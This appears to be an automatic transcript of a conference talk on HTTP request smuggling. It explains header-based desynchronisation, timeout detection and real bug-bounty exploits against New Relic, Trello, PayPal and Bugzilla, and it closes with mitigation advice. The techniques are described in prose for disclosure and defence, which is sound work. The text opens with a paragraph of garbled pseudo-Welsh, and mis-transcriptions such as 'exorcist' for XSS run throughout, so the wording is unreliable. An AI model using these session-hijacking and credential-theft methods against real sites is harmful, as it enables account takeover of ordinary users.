 Yr cyfnod, ac welwch i'w ddweud cymaint o Ddechysg Llywodraeth, gyda'r cyfnod i'r ddweud ar y ddweud yma. Felly mae'r cyfnod sy'n cymaint yw'r cyfnod sy'n cyntaf sy'n cymaint yw'r cyfnod sy'n cyfnod. Yn ymdweud, rydym yn ymdweud yw'r leiaf ar leiaf ar y llai a'r cyfeithio'r llunio'r ddechysgau o'r cyfnod yw'r cyfnod ar y website, ac mae'n gweithio ychydig o ddweud yma Http is statless, and you send one request, you get one response. But what if both of those were just kind of wrong? In this session, I'll share with you new tools and techniques to desynchronise complex systems, smash through the barriers around Http requests, and make websites rain exploits on their visitors. During some research last year, I came up with a theory which was, if you're trying to select a topic to research, then the best topic is the one that makes you the most nervous. So I asked myself what topic am I personally really scared of? And the answer was Http requests smuggling. I saw a presentation on this at DEFCON a few years ago called Hiding Rockies in Http, and it was a thrilling presentation, but it also left me far too nervous to want to tackle this topic myself. One reason is that this technique was documented way back in 2005, and yet I'd never seen it successfully applied to a real website. Another is that my technical understanding just wasn't there, so some of the diagrams made absolutely zero sense to me, no matter how much I stared at them. And also some of the statements on the slides were quite concerning. They said things like, you will not earn bounties using this technique. And even worse, you will certainly not be considered like a white hat if you try and test any live website to see if it's vulnerable to this technique. So at the time, I just stayed away from this topic, but this year I thought I'd tackle it and see what happened. And quite a few things happened. I did manage to earn some bounties, and no one's called me a black hat for it so far, although yesterday on Twitter, one guy did call me a terrorist. But I did get quite a few interesting reactions from the people that I reported these vulnerabilities to. Quite a few people were surprised. One guy was so surprised, he appeared to think I was faking the entire thing, that I was doing some kind of digital sleight of hand in order to trick him into paying me a bounty. Another guy, at the opposite end of the spectrum, liked the unique technique that I used on his website so much. He thought he would take this technique and use it himself on some other bug bounty targets to make himself some money behind my back. And at the time, obviously I had an idea he was doing this. He didn't tell me. But then he ran into some technical issues with the technique and decided the best way to solve them was to pretend that he'd independently found this technique and then email me and asked for help, which didn't work out very well for him. But out of all of this chaos, I've been able to bring you safe detection methods to let you find this with zero risk of being called a black hat. All new methods to trigger desynchronisation and exploit the results. And fresh methodology and tooling to bring clarity to a topic that's been ignored for far too long. So first I'm going to talk about what makes this attack possible, how to assess if a target is vulnerable and what to do next. Then I'll take a look at how to exploit it using case studies all based on real websites. Starting out with some really easy stuff and then building in complexity and ending with a video of exploitation of a local system in which I'll also show how to use the open source burp suite extension that I'm releasing as part of this research. After that I'll talk about how to prevent these attacks and then wrap up and take questions if there's any time left. If you picture a website as an end user it probably looks something like this because as an end user that's all that we can directly see. But behind the scenes most modern websites are routing requests through a chain of web servers speaking to each other using HTTP over a stream-based transport layer protocol like TCP or TLS. And for the sake of performance these streams are heavily reused following the HTTP 1.1 Keep Alive protocol which means that HTTP requests are placed back to back on these streams with no delimiters in between them and each server in the chain is required to parse the HTTP headers of each request to work out where that request stops and the next one starts. So with this set up we've got requests from users all around the world being funneled over a small pool of TCP or TLS streams to the backend server that then has to parse these requests to kind of split them back up into individual requests. Having said all of that it's pretty obvious what's going to go wrong here, right? What happens if an attacker sends an ambiguous message? One that gets parsed differently by the front end and the back end system. So here the front end thinks this is one request. So it's forwarding the whole thing onto the back end. But the back end for some reason it thinks this message ends with the final blue square so it thinks that the orange square is the start of the next request. And it's just going to wait for this phantom request to be completed until the front end routes another request onto the back end over the same socket. And then we end up with these two requests being merged together. So that's it. The essence of request smuggling is that you can set up a prefix on the back end that will be applied to the next request that hits the back end, whether that request is sent by us or by somebody else. Because we can't directly see what's happening behind the front end we have to infer everything and it's really easy to get kind of tangled and bulked down in the technical details. I certainly did myself when doing this research. But ultimately it's really that simple. Now let's zoom in and see what the data looks like on the why. This message is ambiguous because we're using an absolutely classic desynchronisation technique. We've just specified the content length header twice. And the front end is looking at the first content length header so it's forwarding everything onto the back end, including the orange G. And the back end is looking at the second content length header so it's reading in the blue data and it thinks the G is the start of the next request. So when the next real request actually arrives there's this G at the start of it and whoever that user is they're going to get a response saying something like unknown method G post. And that's it. We've successfully done a request smuggling attack. The only catch is this technique is so classic it doesn't really work on anything that's actually worth hacking these dates. What does work on plenty of interesting systems is using chunked encoding. Chunked encoding is an alternative way of specifying the length of the message whereby instead of specifying the length up front using the content length header you send this transfer encoding chunked header and that triggers the server to pass the body of the message until it reaches a zero followed by a blank line. So in this example, once again the front end server has looked at the content length and forwarded everything up to and including the orange G. And the back end system has seen the chunked header and they've stopped parsing the first request after the zero and once again they think the G is the start of the next request and we get a G post response. This is basically exactly the same as what I showed you in the previous slide except that this technique actually works on plenty of real systems. Now what if the desynchronisation happens the other way around? What if it's the front end server that looks at the transfer encoding header and the back end that looks at the content length? Well we can still exploit that, we just need to reformat the attacks slightly and we've got this minor limitation in that our malicious prefix that gets applied to the next request shown in orange has to more or less end with a zero followed by a new line. But in general that's not going to cause any problems. Now if you're looking at the content length on this slide you might be wondering why that's three that's because every line actually ends with slash r slash n more or less that's just not shown on slides to keep them nice and clean. So why does that chunk technique work on so many systems? Well I think we've got to give some credit to the original specification RFC 2616 because that says if as a server you receive a message that has transfer encoding chunked under content length you should prioritise the chunked encoding and that kind of implicitly says that these messages are acceptable that you shouldn't be outright rejecting them and thereby all you need to exploit a website is for one of the servers in the chain to not support chunked encoding and they'll fall back to using the content length and you can desynchronise them. And this technique when I found it worked on pretty much every single website using the content delivery network Akamai. They emailed me this morning to say that they've patched this but I expect it still works on a decent number of systems out there. Now so that's enough by itself to exploit quite a few systems but what do you do if you want to exploit a server where every server in the chain does support chunked encoding? Well that's often still possible. All you need is a way to hide the transfer encoding chunked header from one server in the chain. One way of doing that is by using some white space. So some servers normalise white space after the header name. So some servers will think this says transfer encoding chunked whereas others won't see that, they'll think the space is actually part of the header name won't see the header and they'll fall back to using the content length and you can desynchronise them. Other servers like to grip the transfer encoding header for the word chunked. So they will think that this request is chunked whereas others tokenise the headers so they won't think this is chunked and you can desynchronise them. And there's loads of techniques that you can use to desynchronise systems like this. This is just a tiny sampling of them but every technique on this slide is one that I've successfully used myself to exploit a real system during this research. The ones that are highlighted in our INJAR techniques that I came up with myself that I don't think are documented anywhere else. So at this point we understand the fundamentals of how to desynchronise servers so we've got a really powerful building block but if we just try and whack a server with this building block we're just going to run into hazards and complications and waste time. To avoid that I've developed this methodology to guide us in a step-by-step manner towards a successful exploit. First off we need to detect when desynchronisation is possible. Now the obvious way of doing this is to send a pair of requests where the first one is ambiguous so it's designed to poison the back end with a prefix and then the second request is designed to kind of trigger this poisoned response. But that technique is massively unreliable because if anyone else's request hits the back end in between our two requests they'll get the poisoned response, they'll potentially have a bad day and we won't find the vulnerability. So we need a better way of doing it. And after a lot of effort I think I've got one here so how this server gets handled, how this request gets handled depends on how the servers process these headers. If both systems look at the content length we get the response pretty much immediately and everything's fine. If the front end server thinks this message is chunked then it will read in the first chunk size of three, read in the ABC and then it will read in the next chunk size which is Q, which is not a valid chunk size because that's going to be hexadecimal and thereby it will just reject this request outright and it will never even hit the back end system. But if the front end looks at the content length header and forwards all the blue data but not the orange Q onto the back end and the back end thinks this message is chunked then the back end will basically just time out while waiting for the next chunk size to arrive. So if we send that request and we get a time out that's a strong indication that that server is vulnerable to request smuggling using that technique. And we can detect when the desynchronisation happens the other way round using a fairly similar payload. The only significant difference here is that if the server is vulnerable the first way round then we end up accidentally poisoning the back end socket with the orange X, which is not an ideal outcome. So you should make sure you always try the technique on the left first. Now this technique should be tried on every single endpoint on the target website because they may route requests to different endpoints to different back end servers. And you should try this with every desynchronisation technique that you know. And this strategy is now used by Burp Suite scanner and also by the free open source tool that I'm releasing as part of this research to find this vulnerability. Now because this technique is based on influence it will get some false positives but it doesn't get very many and there's real strength is you'll get vastly less false negatives and there's no risk to real users. For example on one target that I found this technique detected the vulnerability every single time whereas using the classic approach of sending a pair of requests I had to make 800 attempts before one was successful and that's potentially 800 real users that got a broken response. Now in an ideal world you could stop there but most people probably want you to prove that the vulnerability really definitely exists. So to do that we're going to use this technique where you send a pair of requests and it's kind of unreliable but we don't have much choice. So here the first request is going to smuggle this prefix shown in orange and then we're going to send a second separate request shown in green and based on the response that we get to that request we can tell whether the server is vulnerable. Now it's crucial that these two requests are not sent over the same connection to the front end server because if you do that you'll just get false positives and also the end point that you send these requests to is really important because often if the back end doesn't like the request that it receives it will reject it with like a 400 or 500 message and it will close the connection to the front end server which will mean that the orange poisonous that will be thrown out and the attack will fail. So you want to try and select an end point that expects to receive a post request and also try and preserve any parameters that it needs. For example in these examples here I've preserved the queue equal smuggling parameter. The other thing is please remember that even if you do all of that these techniques, this technique is non deterministic. If anyone else's request lands in between your two requests it will fail and also even if the target has no other users browsing it many websites use a pool of connections to the back end and so it may still require multiple attempts but as soon as one works you know it's vulnerable. Right now we're done with the theory we can finally take a look at what damage we can do using this technique. Every case study here is a real system might explode during this research. I have unfortunately been forced to act rather a large number of company names but I'd like to give a shout out to every company that actually let me name them. Please remember these are the guys that are now actually secure. Also during this section I'm going to keep a running total of the bounties earned via this research. As usual of this of these bounties we've spent 50% on beer and donated the other 50% to local charities. Now probably the easiest attack you can do with request smuggling is bypassing security rules that have been implemented on the front end system. On one well-known software vendor I found that their front end was blocking access to slash admin so by using request smuggling their front end would first think I was accessing the route of the website and then when I sent the follow-up requesting green it would once again think I was accessing the route of the website but the back end would think I was trying to hit the admin page and serve it up. So far so simple. Now lots of front ends like to rewrite requests by adding headers to them and one header practically every system uses some variation of is x-forded for which just specifies the remote user's IP. Now if you specify this header yourself directly in a normal request any well-configured front end will rewrite that header or remove it entirely and so it won't work but when you smuggle a request you effectively bypass all the rewrite rules used on the front end and thereby you can spoof your IP and make it look like your request is coming from anywhere. Using this technique I exploited a particular security vendor and got an incredible $300 bounty. So I'm not suggesting that you're going to get rich quick using this particular technique but it's worth knowing because it does work on practically every target and also there's a slightly less obvious use for this technique. Imagine you've found a website where the time out based detection technique works so you're fairly sure it's vulnerable but their traffic volume is so high that you've effectively got zero chance of ever getting a poisoned response yourself. What you've effectively got there is a blind request smuggling vulnerability. How can you prove that that system is really vulnerable? Well one thing you can try is send a request that looks something like that but stick a unique host name in the X forwarded foreheader. If you get a DNS look up for that host name that proves that the orange data has been interpreted as a second request by the back end system and thereby proves that it is vulnerable to request smuggling. Now IP spoofing is okay but the really interesting behaviour is going to come from custom application specific headers but to exploit those we need to know what they are. Now on New Relic I was able to submit a login request and I just shuffled the parameters so that the email address parameter was last so then when I sent my follow-up request it effectively got concatenated into the email address that I was trying to log in with so the response that I got from the server contained the entirety of my second request including all of the headers that the front end had stuck onto that request and some of those are going to come in really useful on the next slide. So on New Relic it became evident that the back end system wasn't the actual most back end back end it was a reverse proxy so by changing the host header I could access different internal systems. I basically had SSRF using request smuggling. However pretty much all of these systems responded with this redirect to HTTPS because they thought my request was being sent over HTTPS but by looking at the previous slide getting the X forwarded proto header and sticking that on there I could tell them yeah I'm using HTTPS you can trust me and actually gain access to those systems. So I went exploring and I found a page that gave me a incredibly taunting error message it said not authorised with header and then it had a colon but it didn't tell me what the name of the header that I wasn't authorised with actually was and so I went exploring looked through the headers I'd already discovered the names of and I tried the XXNR external service header and that actually just made the problem worse and at this point I could have tried that request reflection technique on loads of different endpoints on different New Relic systems until I discovered this header but I was feeling kind of lazy at this point so I decided instead I was going to cheat and consult my notes from last time I compromised New Relic and that revealed the service gateway account ID and service gateway is New Relic admin headers so using those I was able to gain full access to their core internal API and impersonate any user on the entire system as an admin and gain pretty much full control over everything and I got a reasonable bounty for that and they patched that pretty quickly with a hotfix but they said that the root cause was their F5 load balancer and I don't think that's been patched yet so that's a zero day more or less. Now what we've seen here is with requests smuggling if you're willing to put the time in you can often break directly into internal systems and have a good time but there's also much easier and more reliable techniques focused on attacking other users so that's what we're going to take a look at next. Firstly if the application has any way of persistently storing text data then exploitation is really easy. On Trello which is a popular note taking application I smuggled a request to update my profile and I made sure that the bar parameter was last and then I didn't send a follow up myself so some random other Trello users request got concatenated on to the end and then I could just browse to my bio and retrieve their entire request including all their session cookies even though they're both secure and HTTP only. So using this technique with zero user interaction you can just every time you send this you get control over a random person who is currently browsing the website. On a different target they didn't have any obvious way of persistently storing data but I was able to file a support ticket and get the user's request concatenated into that ticket so that eventually I would get an email containing their request and could once again hijack their account. Now what if you can't store data? Well there's a whole nother branch of attack based on causing harmful responses to get served directly to people browsing the site. The simplest one conceptually is one I found on a well-known SAS vendor that hasn't patched it that's why I can't name them. They had some reflected exorcist right and by itself that's okay but it's not that great because it requires user interaction to exploit people so it's not ideal for mass exploitation but by smuggling the request that triggered the exorcist I could get the harmful response served to random other people browsing the website. So we've taken this issue and we can just exploit random people with no user interaction. We can also grab haste to be only cookies once again using this technique and this can also be used with traditionally unexploitable exorcists like exorcists in the user agent header or exorcists where there's a C-surf token on the request. Now while testing one target I happened to load their home page in a web browser where the developer tool was open and this error message popped up and normally you know so what but I kind of recognised that IP address in this error message which made me a little bit worried and what was more worrying is that I got that error message regardless of what device I loaded the home page on and what network I connected from and it turned out yep this was my fault I'd sent a request trying to trigger a redirect from their system and someone else's request and attempt to fetch an image had been concatenated onto it. So they got this redirect response which is you know okay that's not ideal but it's only one user right who cares about them but a cache had seen this happen. So it's seen them try to fetch this image from the home page and it's seen this redirect to my server come back and then it had saved this so for the following 48 hours everyone that went to the target's home page ended up trying to fetch this image from my website. Now on the one hand this is a brilliant demonstration of how easy it is to do cache poisoning with request smuggling right it's so easy I did it by accident but on the other hand this is not something that you really want to happen unintentionally so there's some things you can do to try and reduce the chance of this one is to one is to try and specify a prefix that triggers a response that will have anti caching headers and another is to send your victim follow up requests as fast as possible and another is if you've got a choice of front ends then just try and target one in a geographic region that's like a sleep at the time and then you'll be racing against less genuine users traffic. Now that wasn't ideal but naturally it left me wondering what happens if we embrace this possibility. So here I've smuggled a request saying I'd like to fetch my API key please and if someone else's request gets concatenated on to that it's completed with their cookie in their session and it fetches their API key and then fetching their own API key is harmless but if a cache sees that happening and saves it then we can just browse to whatever static resource that user was trying to fetch and retrieve their key. If this attack sounds kind of familiar yep that's because this is basically just a variation of web cache deception. The key difference is that this technique once again doesn't require any interaction on the part of the user. You're just exploiting a random person browsing the website every time you do it. There's also a minor catch with this technique which is that as an attacker you've got no control over where the user's API key lands on the website. It's just going to appear on a random static resource on that site so you're going to have to like reload all the static resources to try and find that key. Now because my pipeline that I used to get examples for these presentations doesn't bother logging in to websites I don't have a real example of a vulnerable target but I'm pretty sure this vulnerability does exist out there and in general you're going to find it in places that have those properties. Now on New Relic the back end was an internal proxy and on some other systems the back end was actually a CDN which doesn't make much sense to me. I found one server that chained Akamai on to Cloudflare. Why? But on a different system they chained Akamai on to Akamai but the two Akamais were configured differently so I could desynchronise them and thereby by changing the host header I could serve up content from any website on the Akamai platform on these guys website and the front end Akamai would then cache that so I could override their homepage with any content from any site on the Akamai platform. This technique also works pretty well on SAS providers where you can simply change the host name to a different client of the SAS provider. Now Red Hat's website was itself directly vulnerable to desynchronisation and while looking for a vulnerability to chain with request smuggling on there I found this DOM-based open redirect and that raised an interesting challenge because with request smuggling we control the URL that the back end server thinks the user is on but we don't control the URL in the victim's browser. So when this get query pram function is executed that's executed in the victim's browser so we can't directly exploit this vulnerability but by finding a local redirect on the target I could effectively chain that with the DOM-based redirect and gain control of the URL in the user's browser and exploit this issue and that's a generic technique that will work that will let you combine any DOM-based issue that looks at the URL with request smuggling to exploit people without user interaction. Now quite a few local redirects actually turn into open redirects in the presence of request smuggling because we can change the host header. In particular there's a default behaviour on a patchy and most versions of IIS whereby if you try and access a folder and you don't specify the training slash they give you a redirect to put the slash on and they populate host name in that redirect using the host header. Because this technique works on loads of systems and you can use that to redirect JavaScript loads on the target website and thereby gain full control over whatever page the JavaScript load comes from and use it for cache poisoning and gain full control over the website more or less permanently. This became my default technique to exploit this vulnerability and I got quite a few different bounties using it. A couple of extra points worth mentioning, if you get a 307 open redirect that is absolute gold dust because imagine a web browser is doing a post request to log someone in. If it receives a 307 redirect it will repost those credentials to the new website. So you can just make people send you their username and password in plain text with no user interaction. Also worth mentioning is that some thick clients like a non-browser based HTTP libraries have that data reposting behaviour on all redirects rather than just 307 ones. So for example on a new relic I was able to steal the API tokens off one of their clients even though they were only using a 301 redirect. Now one of the targets that this redirect cache poisoning JavaScript hijacking strategy worked on was PayPal. If you tried to access web static they gave you a redirect using the host header to populate it. There was a couple of problems though. One is that the two host headers were getting concatenated and we only controlled the first one so this was breaking the redirect. But that was easily fixed by sticking a question mark at the end of the host header. The other issue is the protocol on this redirect. It's HTTP and because of browsers and mixed content protections that meant that this is only going to be exploitable in Safari and Edge and I for the details of how you can exploit those you'll need to check out my cache poisoning presentation from last year because I don't have time to cover it right now. But the important thing is this JavaScript file that I could persistently turn into a redirect to my own malicious JavaScript file was used on PayPal's login page. Unfortunately their login page used CSP which blocked the redirect. But their login page also loaded a different page in an iframe and this sub page didn't use CSP and also imported my poison JavaScript file so I could hijack the iframe. But thanks to the same origin policy I couldn't read the user's password off the parent page because I was stuck on c.paypal.com. But my colleague Gareth Hayes found an endpoint paypal.com slash US slash GIFTS and this is a static page. It doesn't have CSP or it didn't at the time and it once again imports my malicious JavaScript file. So by first compromising the iframe because it loads c.paypal.com and then redirecting the iframe to paypal.com slash US slash GIFTS and then re-compromising it using my JavaScript file I could then read the user's paypal password off the parent page and send it off to my website. So the end impact is if you went to PayPal's website in one of those browsers I just more or less got your password and they paid a healthy $19,000 bounty for that. Now PayPal fixed this issue by reconfiguring the front end which was Akamai to block any requests that had the word chunked in the transfer encoding header and they asked me like Albinoax do you think this is a solid fix and I kind of poked at it for a little bit and I was like yep look solid to me. And then a few weeks later I decided to try out a new desynchronisation technique where I simply used a linewrapped header and this strategy is pretty much RFC compliant and I didn't really think it was going to work on it work on anything and it didn't directly work on any systems. But it turns out there was a little bug in Akamai whereby if you use linewrapping they don't see any of the data after the linewrap. So that meant they didn't see this header, they let it through, I could once again desynchronise PayPal's login page, take control of it and I got another $20,000 bounty. I thought that was really generous of PayPal especially given that it was basically my fault in the first place. So now we've seen a whole range of different attack techniques that you can do with request smuggling, it's time for the demo. So this is Bugzilla, this is an exact replica of the target system, holds lots of juicy Firefox zero days, any given time. I'm going to take the request to the home page and I'm going to right click on it and click launch smuggle probe which is an option there because I've installed this free open source burp extension and I've disabled all the desynchronisation techniques except for the one that's actually going to work. Now we're going to look at flow which is a separate extension that just shows you the requests and you can see that here I'm using the time out technique to detect the vulnerability and it seems to be working. Now if you look at the headers you can see, it's probably too small to see, but you can see the previous header, the one before transfer encoding ends with OA when all the other headers end with OD OA. That's what's causing the desynchronisation here. So the front end thinks that Fu's transfer encoding is one header whereas the back end which is Nginx sees them as two different headers and thereby we can desynchronise them. You can see it's found the vulnerability here so I'm going to right click on the request and click smuggle attack. This pops open a turbo intruder window. You don't need to change anything here apart from the prefix variable which is just the malicious prefix that gets applied to the next request. So when I launch attack it's going to send the attack and then loads of victim requests which are all identical and you can see the first one even though it's identical to the third, to the second, gets a 404 status code back and that's because of the prefix that we've specified here to try and make it trigger a 404. So that kind of proves this system is vulnerable and I'm just going to replay that to show it's completely consistent and you can show if you change the prefix then the behaviour that you get on the second request will change. So we know this system is vulnerable to request smuggling, we just need to exploit it. On bug Zilla, anyone can register an account, file a bug and put an attachment on the bug that contains HTML. But this gets rendered on a different domain. See, we're on BMOSanbox.vm so by itself you can't do any damage with this feature. This is not a vulnerability on its own. Thanks to the same origin policy. But we're going to see if we can chain that behaviour with request smuggling to actually achieve something useful. So here I'm going to take the request to fetch the attachment which is sent to BMOSanbox. But it's actually on the same IP as BMOSweb on real bug Zilla systems and I'm going to stick that in the malicious prefix. I'm just going to leave this X ignore header on the end because the victim's request gets concatenated directly onto that. So here you can see the victim request has been sent to BMOSweb.vm but it's retrieved this malicious HTML. So all that remains now is just to prove this vulnerability really works inside a browser. So I'm going to comment out the victim requests. I'm going to send this and basically leave the back end poisoned with this malicious half a request. And now any user, no matter what they click, they're going to get the response back. It's going to steal their password. Great. That got a $4,500 bounty taking the total amount earned during this research to 70K. That's the total so far but there should be some more bounties on the way hopefully. Now as far as preventing these attacks goes, they're best off prevented on the front end system because the back end can't normalise requests. It just has to reject them outright. But firstly, you can't fix this unless you can find it properly. So make sure that whatever tool you're using supports sending invalid content length headers and doesn't automatically normalise requests. In particular, that means if you're trying to replicate this vulnerability using curl, depending on which desynchronisation technique you're using, it may not work. Also, some companies like to proxy pentesters. And if you do that, you'll fail to find genuine vulnerabilities that exist and you'll also find kind of phantom vulnerabilities that only let you exploit other pentesters. So it's not a very good idea. As far as patching this goes, the ideal is just to make the front end exclusively use HTTP2 to talk to the back end. But if that's not plausible, then the front end needs to normalise any ambiguous requests before rooting them downstream. That strategy is backed up by RFC 7 230. So that's probably what you want to do. If you're stuck on the back end, yeah, you just have to reject the request outright and drop the connection. It's not ideal, which is why this is better off being patched on the front end. There's loads of resources online for this. There's the white paper. Check that out. We've also, for the first time, released a whole bunch of free online laps. So you can practise exploiting this vulnerability on replica real systems and just get familiar with it without the carnage that you get when you try and exploit this on a real site. Also, the source code for the tool is online. That works in the free version of Burp as well as the pro version and both of the references are both well worth checking out. The three key things to take away are that HTTP request smuggling is a real vulnerability. It doesn't matter if it's scary, you can still get hacked with it. HTTP 1.1 parsing is a security critical function and it should always be audited in web servers before you even think about using them. And detection of request smuggling doesn't have to be dangerous. I'm going to take two minutes of questions now. If you have it any more after that, feel free to come and speak to me at the back or chat me an email. Don't forget to follow me on Twitter. Thank you for listening.